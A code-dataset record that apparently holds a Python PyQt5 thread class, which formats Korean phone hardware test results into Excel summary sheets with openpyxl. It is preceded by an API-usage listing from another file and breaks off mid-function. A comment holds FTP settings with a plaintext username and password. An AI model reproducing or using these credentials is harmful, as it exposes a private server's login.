"call"}, {"api_name": "libspitz.log_lines", "line_number": 255, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 255, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 255, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_send_task", "line_number": 263, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 263, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 269, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_full", "line_number": 277, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 277, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 279, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_more", "line_number": 282, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 282, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 292, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 294, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 294, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 294, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 310, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 312, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 312, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 312, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_read_result", "line_number": 320, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 320, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 326, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 335, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 337, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 337, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 337, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 353, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 365, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 369, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 378, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 382, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_full", "line_number": 396, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 396, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_send_more", "line_number": 402, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 402, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_send_rjct", "line_number": 408, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 408, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 412, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 418, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 423, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 424, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 424, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 424, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_read_empty", "line_number": 440, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 440, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_read_result", "line_number": 453, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 453, "usage_type": "name"}, {"api_name": "libspitz.messaging.res_module_error", "line_number": 460, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 460, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 461, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 464, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 468, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 473, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 485, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 498, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 504, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 515, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 543, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 547, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 559, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 562, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 565, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 569, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 577, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 579, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 579, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 579, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 590, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_heart", "line_number": 596, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 596, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 598, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 600, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 600, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 600, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 609, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 610, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 610, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 632, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 635, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 638, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 645, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 648, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 648, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 658, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 663, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 668, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 676, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 688, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 694, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 695, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 695, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 709, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 712, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 715, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 722, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 726, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 726, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 731, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 735, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 736, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 743, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 749, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 756, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_terminate", "line_number": 766, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 766, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 770, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 772, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 772, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 772, "usage_type": "attribute"}, {"api_name": "libspitz.memstat.stats", "line_number": 779, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 779, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 786, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 791, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 796, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 801, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 810, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 812, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 815, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 819, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 821, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 821, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 824, "usage_type": "call"}, {"api_name": "libspitz.messaging.res_module_noans", "line_number": 825, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 825, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 828, "usage_type": "call"}, {"api_name": "libspitz.messaging.res_module_ctxer", "line_number": 829, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 829, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 831, "usage_type": "call"}, {"api_name": "Args.Args", "line_number": 843, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 848, "usage_type": "call"}, {"api_name": "libspitz.memstat.enable", "line_number": 852, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 852, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 853, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 853, "usage_type": "name"}, {"api_name": "libspitz.PerfModule", "line_number": 857, "usage_type": "call"}, {"api_name": "libspitz.make_uid", "line_number": 857, "usage_type": "call"}, {"api_name": "libspitz.JobBinary", "line_number": 861, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 880, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 883, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 884, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 884, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 886, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 886, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 896, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 896, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 899, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 906, "usage_type": "attribute"}]} +{"seq_id": "285717113", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thr Oct 18 14:25:12 2019\n@author: TestEnC hanrim lee\n\n\"\"\"\nimport os\nimport sys\nimport re\nimport openpyxl\n# import pkg_resources.py2_warn\nfrom os.path import expanduser\nimport threading\n\n#from konlpy.tag import Komoran\nfrom time import sleep\nfrom datetime import datetime\n\n#import pytagcloud\nfrom PyQt5.QtCore import QThread, pyqtSignal\n#selenium library\nfrom openpyxl.styles import Alignment, Font, NamedStyle, PatternFill\nfrom openpyxl import formatting, styles, Workbook\nfrom openpyxl.styles.borders import Border, Side\n\nclass Formater(QThread):\n\n print_flag = pyqtSignal(str)\n end_flag = pyqtSignal()\n fileCheck_flag = pyqtSignal()\n progress_flag = pyqtSignal()\n count_flag = pyqtSignal()\n dict_result = None\n tot_count = 0\n\n def __init__(self, filePath, opFlag, modeFlag, parent=None):\n QThread.__init__(self, parent)\n\n self.file_names = filePath\n self.list_files = self.file_names.split(\",\")\n self.list_out_files = []\n self.dict_out = {}\n self.dict_readData = {}\n # self.list_sheet_names = []\n\n self.opFlag = opFlag\n self.modeFlag = modeFlag\n self.home = expanduser(\"~\")\n\n self.end_count = \"n\"\n self.totalRows = 0\n self.currentRow = 0\n self.current_path = os.getcwd()\n self.battery_spec = 0.0\n\n # style fill pattern\n # FF0000 red\n # 0000FF blue\n\n self.brown_fill = PatternFill(start_color='DDD9C4', end_color='DDD9C4', fill_type='solid')\n self.light_brown_fill = PatternFill(start_color='EEECE1', end_color='EEECE1', fill_type='solid')\n self.gray_fill = PatternFill(start_color='E7E6E6', end_color='E7E6E6', fill_type='solid')\n self.dark_gray_fill = PatternFill(start_color='D9D9D9', end_color='D9D9D9', fill_type='solid')\n self.light_gray_fill = PatternFill(start_color='F2F2F2', end_color='F2F2F2', fill_type='solid')\n self.apricot_fill = PatternFill(start_color='FDE9D9', end_color='FDE9D9', fill_type='solid')\n self.skyBlue_fill = PatternFill(start_color='DCE6F1', end_color='DCE6F1', fill_type='solid')\n self.yellow_fill = PatternFill(start_color='FFFF00', end_color='FFFF00', fill_type='solid')\n self.orange_fill = PatternFill(start_color='FFC000', end_color='FFC000', fill_type='solid')\n\n # style font color and size\n self.top_font = Font(name='맑은 고딕', size=12, bold=True, color='2B2B2B')\n self.index_font = Font(name='맑은 고딕', size=11, bold=True, color='2B2B2B')\n self.value_font = Font(name='맑은 고딕', size=11, bold=False, color='2B2B2B')\n self.value2_font = Font(name='맑은 고딕', size=10, bold=True, color='2B2B2B')\n self.f2_value_font = Font(name='맑은 고딕', size=10, bold=False, color='2B2B2B')\n self.f2_blue_font = Font(name='맑은 고딕', size=10, bold=False, color='0000FF')\n self.f2_red_font = Font(name='맑은 고딕', size=10, bold=False, color='FF0000')\n\n # style Alignment\n self.general_alignment = Alignment(wrap_text=True, horizontal=\"center\", vertical=\"center\")\n self.top_alignment = Alignment(wrap_text=False, horizontal=\"left\", vertical=\"center\")\n self.top_alignment_2 = Alignment(wrap_text=True, horizontal=\"left\", vertical=\"center\")\n self.top_alignment_3 = Alignment(wrap_text=True, horizontal=\"left\", vertical=\"top\")\n\n # style border\n self.thin_border = Border(left=Side(style='thin'), right=Side(style='thin'), top=Side(style='thin'), bottom=Side(style='thin'))\n\n # ftp 관련 변수 및 설정\n # self.hostname = '192.168.0.108'\n # self.port = 21\n # self.username = 'voc'\n # self.password = 'testenc@01'\n\n # 분석 처리 개수 체크 함수\n def getCountRows(self):\n\n while True:\n if self.end_count is \"n\":\n sleep(0.5)\n self.count_flag.emit()\n else:\n break\n\n # 로그 문자 처리 함수\n def setPrintText(self, text):\n\n strToday = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n text = self.find_between(text, \"/s\", \"/e\")\n print_text = strToday+\":\\n\"+text+\"\\n\"\n self.print_flag.emit(\"{}\".format(print_text))\n\n # 쓰레드 종료 함수\n def stop(self):\n sleep(0.5)\n self.terminate()\n\n # 특수 문자 제거 함수\n def removeString(self, text):\n\n tempText = re.sub('[-=+,#/\\?^$@*\\\"※~&%ㆍ!』\\\\‘|\\(\\)\\[\\]\\<\\>\\{\\}`><]\\'', '', text)\n return tempText\n\n # 문장 앞 부터 조건에 맞는 문자열 substring\n def find_between(self, s, first, last):\n try:\n returnData = \"\"\n start = s.index(first)+len(first)\n end = s.index(last, start)\n returnData = s[start:end]\n return returnData\n except ValueError:\n return returnData\n\n # 문장 뒤 부터 조건에 맞는 문자열 substring\n def find_between_r(self, s, first, last ):\n try:\n returnData = \"\"\n start = s.rindex(first)+len(first)\n end = s.rindex(last, start)\n returnData = s[start:end]\n return returnData\n except ValueError:\n return returnData\n\n # float num check a point\n def check_num(self, num):\n\n return_data = None\n if num is None or num == '':\n return_data = '-'\n else:\n try:\n return_data = '%.2f'%float(num)\n except:\n return_data = str(num)\n\n return return_data\n\n # check calculate comparison\n def cal_comparison(self, standard, measure):\n\n return_data = None\n try:\n return_data = self.check_num(abs(round(abs(float(measure)) - float(standard), 2)))\n except:\n return_data = '-'\n\n return return_data\n\n # check convert num available\n def isNumber(self, string_data):\n\n try:\n temp_data = float(string_data)\n return True\n except:\n return False\n\n # check convert num available\n def check_empty(self, string_data):\n\n return_data = None\n if string_data is None or string_data == '' or string_data.lower() in ['n/a', 'na', 'nt', 'n/t']:\n return_data = '-'\n else:\n return_data = str(string_data)\n\n return return_data\n\n # summary Tab\n def summary_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n temp_data = {}\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n\n # get data from wb_input\n sheet_in = wb_input['Summary']\n temp_data['팻네임 / 모델명'] = sheet_in['C5'].value\n temp_data['OS 및 Binary Version'] = sheet_in['C8'].value + \"/\" + sheet_in['C6'].value\n temp_data['Chipset (AP / CP)'] = sheet_in['K6'].value\n temp_data['가로 폭 (mm) / Display Size (inch)'] = sheet_in['K7'].value\n temp_data['배터리 용량 (mAh)'] = str(sheet_in['K8'].value)+'mAh'\n self.battery_spec = float(sheet_in['K8'].value)\n temp_data['검증 차수'] = sheet_in['C9'].value\n temp_data['검증 기간'] = sheet_in['K5'].value\n\n #option setting wb.output\n sheet_out = wb_output['검증결과요약']\n # sheet row 3 handle\n sheet_out.merge_cells('B3:C3')\n sheet_out['B3'] = \"1. 단말 기본 정보\"\n # sheet row 4 handle\n sheet_out.merge_cells('B4:C4')\n sheet_out.merge_cells('D4:E4')\n sheet_out['B4'] = \"팻네임 / 모델명\"\n sheet_out['D4'] = temp_data['팻네임 / 모델명']\n # sheet row 5 handle\n sheet_out.merge_cells('B5:C5')\n sheet_out.merge_cells('D5:E5')\n sheet_out['B5'] = \"OS 및 Binary Version\"\n sheet_out['D5'] = temp_data['OS 및 Binary Version']\n # sheet row 6 handle\n sheet_out.merge_cells('B6:C6')\n sheet_out.merge_cells('D6:E6')\n sheet_out['B6'] = \"Chipset (AP / CP)\"\n sheet_out['D6'] = temp_data['Chipset (AP / CP)']\n # sheet row 7 handle\n sheet_out.merge_cells('B7:C7')\n sheet_out.merge_cells('D7:E7')\n sheet_out['B7'] = \"가로 폭 (mm) / Display Size (inch)\"\n sheet_out['D7'] = temp_data['가로 폭 (mm) / Display Size (inch)']\n # sheet row 7 handle\n sheet_out.merge_cells('B8:C8')\n sheet_out.merge_cells('D8:E8')\n sheet_out['B8'] = \"배터리 용량 (mAh)\"\n sheet_out['D8'] = temp_data['배터리 용량 (mAh)']\n # sheet row 10 handle\n sheet_out.merge_cells('B10:C10')\n sheet_out['B10'] = \"2. 검증 차수 및 검증 기간\"\n # sheet row 11 handle\n sheet_out.merge_cells('B11:C11')\n sheet_out.merge_cells('D11:E11')\n sheet_out['B11'] = \"검증 차수\"\n sheet_out['D11'] = temp_data['검증 차수']\n # sheet row 12 handle\n sheet_out.merge_cells('B12:C12')\n sheet_out.merge_cells('D12:E12')\n sheet_out['B12'] = \"검증 기간\"\n sheet_out['D12'] = temp_data['검증 기간']\n # sheet row 14 handle\n sheet_out.merge_cells('B14:D14')\n sheet_out['B14'] = '3. 검증 결과 (항목수 : 00, Test Case 수 : 78)'\n # sheet row 15 handle\n sheet_out.merge_cells('B15:C15')\n sheet_out['B15'] = '항목'\n sheet_out['D15'] = 'Pass'\n sheet_out['E15'] = 'Fail'\n # sheet row 16 handle\n sheet_out.merge_cells('B16:B19')\n sheet_out['B16'] = 'RF성능'\n sheet_out['C16'] = 'TRP'\n # sheet row 17 handle\n sheet_out['C17'] = 'TIS'\n # sheet row 18 handle\n sheet_out['C18'] = '속도'\n # sheet row 19 handle\n sheet_out['C19'] = 'Call Setup Test'\n # sheet row 20 handle\n sheet_out.merge_cells('B20:C20')\n sheet_out['B20'] = 'MOS'\n # sheet row 21 handle\n sheet_out.merge_cells('B21:C21')\n sheet_out['B21'] = '배터리소모전류 (시간)'\n # sheet row 22 handle\n sheet_out.merge_cells('B22:C22')\n sheet_out['B22'] = '주파수동조'\n # sheet row 23 handle\n sheet_out.merge_cells('B23:C23')\n sheet_out['B23'] = '발열'\n sheet_out['D23'] = ''\n sheet_out['E23'] = ''\n # sheet row 24 handle\n sheet_out.merge_cells('B24:C24')\n sheet_out['B24'] = '소계'\n sheet_out['D24'] = ''\n sheet_out['E24'] = ''\n # sheet row 25 handle\n sheet_out.merge_cells('B25:C25')\n sheet_out.merge_cells('D25:E25')\n sheet_out['B25'] = '점수 (가/감점)'\n sheet_out['D25'] = '86.9(+12)'\n # sheet row 26 handle\n sheet_out.merge_cells('B26:C26')\n sheet_out.merge_cells('D26:E26')\n sheet_out['B26'] = '배터리소모전류 (DOU, Test case : 35)'\n sheet_out['D26'] = '1.44일'\n\n # sheet row 26 handle\n sheet_out.merge_cells('B28:E28')\n sheet_out.merge_cells('B29:E29')\n sheet_out['B28'] = '4. 특이사항'\n sheet_out['B29'] = ''\n\n self.setPrintText('/s {}번 파일 \"검증결과요약\" 테이터 입력 완료 /e'.format(idx+1))\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"B3:E26\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n for mCell in sheet_out[\"B29:E29\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [3.38, 20, 20, 20, 20]\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[29].height = 85.5\n\n # Set style on Cell\n # row 3\n sheet_out['B3'].font = self.top_font\n sheet_out['B3'].alignment = self.top_alignment\n # row 4\n sheet_out['B4'].font = self.index_font\n sheet_out['B4'].fill = self.brown_fill\n sheet_out['B4'].border = self.thin_border\n sheet_out['D4'].font = self.index_font\n sheet_out['D4'].border = self.thin_border\n sheet_out['C4'].border = self.thin_border\n sheet_out['E4'].border = self.thin_border\n # row 5\n sheet_out['B5'].font = self.index_font\n sheet_out['B5'].fill = self.brown_fill\n sheet_out['B5'].border = self.thin_border\n sheet_out['D5'].font = self.index_font\n sheet_out['D5'].border = self.thin_border\n sheet_out['C5'].border = self.thin_border\n sheet_out['E5'].border = self.thin_border\n # row 6\n sheet_out['B6'].font = self.index_font\n sheet_out['B6'].fill = self.brown_fill\n sheet_out['B6'].border = self.thin_border\n sheet_out['D6'].font = self.index_font\n sheet_out['D6'].border = self.thin_border\n sheet_out['C6'].border = self.thin_border\n sheet_out['E6'].border = self.thin_border\n # row 7\n sheet_out['B7'].font = self.index_font\n sheet_out['B7'].fill = self.brown_fill\n sheet_out['B7'].border = self.thin_border\n sheet_out['D7'].font = self.index_font\n sheet_out['D7'].border = self.thin_border\n sheet_out['C7'].border = self.thin_border\n sheet_out['E7'].border = self.thin_border\n # row 8\n sheet_out['B8'].font = self.index_font\n sheet_out['B8'].fill = self.brown_fill\n sheet_out['B8'].border = self.thin_border\n sheet_out['D8'].font = self.index_font\n sheet_out['D8'].border = self.thin_border\n sheet_out['C8'].border = self.thin_border\n sheet_out['E8'].border = self.thin_border\n # row 10\n sheet_out['B10'].font = self.top_font\n sheet_out['B10'].alignment = self.top_alignment\n # row 11\n sheet_out['B11'].font = self.index_font\n sheet_out['B11'].fill = self.brown_fill\n sheet_out['B11'].border = self.thin_border\n sheet_out['C11'].font = self.index_font\n sheet_out['C11'].border = self.thin_border\n sheet_out['D11'].border = self.thin_border\n sheet_out['D11'].font = self.index_font\n sheet_out['E11'].border = self.thin_border\n\n # row 12\n sheet_out['B12'].font = self.index_font\n sheet_out['B12'].fill = self.brown_fill\n sheet_out['B12'].border = self.thin_border\n sheet_out['C12'].font = self.index_font\n sheet_out['C12'].border = self.thin_border\n sheet_out['D12'].border = self.thin_border\n sheet_out['D12'].font = self.index_font\n sheet_out['E12'].border = self.thin_border\n # row 14\n sheet_out['B14'].font = self.top_font\n sheet_out['B14'].alignment = self.top_alignment\n # row 15\n sheet_out['B15'].font = self.index_font\n sheet_out['B15'].fill = self.brown_fill\n sheet_out['B15'].border = self.thin_border\n sheet_out['D15'].font = self.index_font\n sheet_out['D15'].fill = self.brown_fill\n sheet_out['D15'].border = self.thin_border\n sheet_out['E15'].font = self.index_font\n sheet_out['E15'].fill = self.brown_fill\n sheet_out['E15'].border = self.thin_border\n sheet_out['C15'].border = self.thin_border\n # row 16\n sheet_out['B16'].font = self.index_font\n sheet_out['B16'].fill = self.gray_fill\n sheet_out['B16'].border = self.thin_border\n sheet_out['C16'].font = self.index_font\n sheet_out['C16'].fill = self.gray_fill\n sheet_out['C16'].border = self.thin_border\n sheet_out['D16'].font = self.index_font\n sheet_out['D16'].border = self.thin_border\n sheet_out['E16'].font = self.index_font\n sheet_out['E16'].border = self.thin_border\n # row 17\n sheet_out['B17'].border = self.thin_border\n sheet_out['C17'].font = self.index_font\n sheet_out['C17'].fill = self.gray_fill\n sheet_out['C17'].border = self.thin_border\n sheet_out['D17'].font = self.index_font\n sheet_out['D17'].border = self.thin_border\n sheet_out['E17'].font = self.index_font\n sheet_out['E17'].border = self.thin_border\n # row 18\n sheet_out['B18'].border = self.thin_border\n sheet_out['C18'].font = self.index_font\n sheet_out['C18'].fill = self.gray_fill\n sheet_out['C18'].border = self.thin_border\n sheet_out['D18'].font = self.index_font\n sheet_out['D18'].border = self.thin_border\n sheet_out['E18'].font = self.index_font\n sheet_out['E18'].border = self.thin_border\n # row 19\n sheet_out['B19'].border = self.thin_border\n sheet_out['C19'].font = self.index_font\n sheet_out['C19'].fill = self.gray_fill\n sheet_out['C19'].border = self.thin_border\n sheet_out['D19'].font = self.index_font\n sheet_out['D19'].border = self.thin_border\n sheet_out['E19'].font = self.index_font\n sheet_out['E19'].border = self.thin_border\n # row 20\n sheet_out['B20'].font = self.index_font\n sheet_out['B20'].fill = self.gray_fill\n sheet_out['B20'].border = self.thin_border\n sheet_out['D20'].font = self.index_font\n sheet_out['D20'].border = self.thin_border\n sheet_out['E20'].font = self.index_font\n sheet_out['E20'].border = self.thin_border\n sheet_out['C20'].border = self.thin_border\n # row 21\n sheet_out['B21'].font = self.index_font\n sheet_out['B21'].fill = self.gray_fill\n sheet_out['B21'].border = self.thin_border\n sheet_out['D21'].font = self.index_font\n sheet_out['D21'].border = self.thin_border\n sheet_out['E21'].font = self.index_font\n sheet_out['E21'].border = self.thin_border\n sheet_out['C21'].border = self.thin_border\n # row 22\n sheet_out['B22'].font = self.index_font\n sheet_out['B22'].fill = self.gray_fill\n sheet_out['B22'].border = self.thin_border\n sheet_out['D22'].font = self.index_font\n sheet_out['D22'].border = self.thin_border\n sheet_out['E22'].font = self.index_font\n sheet_out['E22'].border = self.thin_border\n sheet_out['C22'].border = self.thin_border\n # row 23\n sheet_out['B23'].font = self.index_font\n sheet_out['B23'].fill = self.gray_fill\n sheet_out['B23'].border = self.thin_border\n sheet_out['D23'].font = self.index_font\n sheet_out['D23'].border = self.thin_border\n sheet_out['E23'].font = self.index_font\n sheet_out['E23'].border = self.thin_border\n sheet_out['C23'].border = self.thin_border\n # row 24\n sheet_out['B24'].font = self.index_font\n sheet_out['B24'].fill = self.light_brown_fill\n sheet_out['B24'].border = self.thin_border\n sheet_out['D24'].font = self.index_font\n sheet_out['D24'].fill = self.light_brown_fill\n sheet_out['D24'].border = self.thin_border\n sheet_out['C24'].border = self.thin_border\n sheet_out['E24'].border = self.thin_border\n sheet_out['E24'].fill = self.light_brown_fill\n # row 25\n sheet_out['B25'].font = self.index_font\n sheet_out['B25'].fill = self.light_brown_fill\n sheet_out['B25'].border = self.thin_border\n sheet_out['D25'].font = self.index_font\n sheet_out['D25'].fill = self.light_brown_fill\n sheet_out['D25'].border = self.thin_border\n sheet_out['C25'].border = self.thin_border\n sheet_out['E25'].border = self.thin_border\n # row 26\n sheet_out['B26'].font = self.index_font\n sheet_out['B26'].fill = self.gray_fill\n sheet_out['B26'].border = self.thin_border\n sheet_out['D26'].font = self.index_font\n sheet_out['D26'].fill = self.light_brown_fill\n sheet_out['D26'].border = self.thin_border\n sheet_out['C25'].border = self.thin_border\n sheet_out['E25'].border = self.thin_border\n # row 28\n sheet_out['B28'].font = self.index_font\n # row 29\n sheet_out['B29'].font = self.index_font\n sheet_out['B29'].border = self.thin_border\n sheet_out['C29'].border = self.thin_border\n sheet_out['D29'].border = self.thin_border\n sheet_out['E29'].border = self.thin_border\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"검증요약결과\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 시험결과요약 Tab\n def test_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n temp_data = []\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n\n # get data from wb_input\n sheet_in = wb_input['시험결과요약']\n for i in range(6, 28):\n temp_data.append([sheet_in['F'+str(i)].value, sheet_in['G'+str(i)].value, sheet_in['H'+str(i)].value])\n\n #option setting wb.output\n sheet_out = wb_output['시험결과요약']\n # sheet row 2 handle\n sheet_out.merge_cells('B2:H2')\n sheet_out['B2'] = 'H/W 검증결과 요약'\n\n # sheet row 4 and 5 handle\n sheet_out.merge_cells('B4:C5')\n sheet_out['B4'] = \"항목\"\n sheet_out.merge_cells('D4:E5')\n sheet_out['D4'] = 'Test case'\n sheet_out.merge_cells('F4:H4')\n sheet_out['F4'] = '결과'\n sheet_out['F5'] = 'Pass'\n sheet_out['G5'] = 'Fail'\n sheet_out['H5'] = '점수'\n\n # sheet 6 ~ 20 handle\n sheet_out.merge_cells('B6:B20')\n sheet_out['B6'] = sheet_in['B6'].value\n sheet_out.merge_cells('C6:C10')\n sheet_out['C6'] = sheet_in['C6'].value\n sheet_out.merge_cells('C11:C15')\n sheet_out['C11'] = sheet_in['C11'].value\n sheet_out.merge_cells('C16:C19')\n sheet_out['C16'] = sheet_in['C16'].value\n sheet_out['C20'] = sheet_in['C20'].value\n sheet_out.merge_cells('D6:D7')\n sheet_out['D6'] = sheet_in['D6'].value\n sheet_out.merge_cells('D8:D9')\n sheet_out['D8'] = sheet_in['D8'].value\n sheet_out['D10'] = sheet_in['D10'].value\n sheet_out.merge_cells('D11:D12')\n sheet_out['D11'] = sheet_in['D11'].value\n 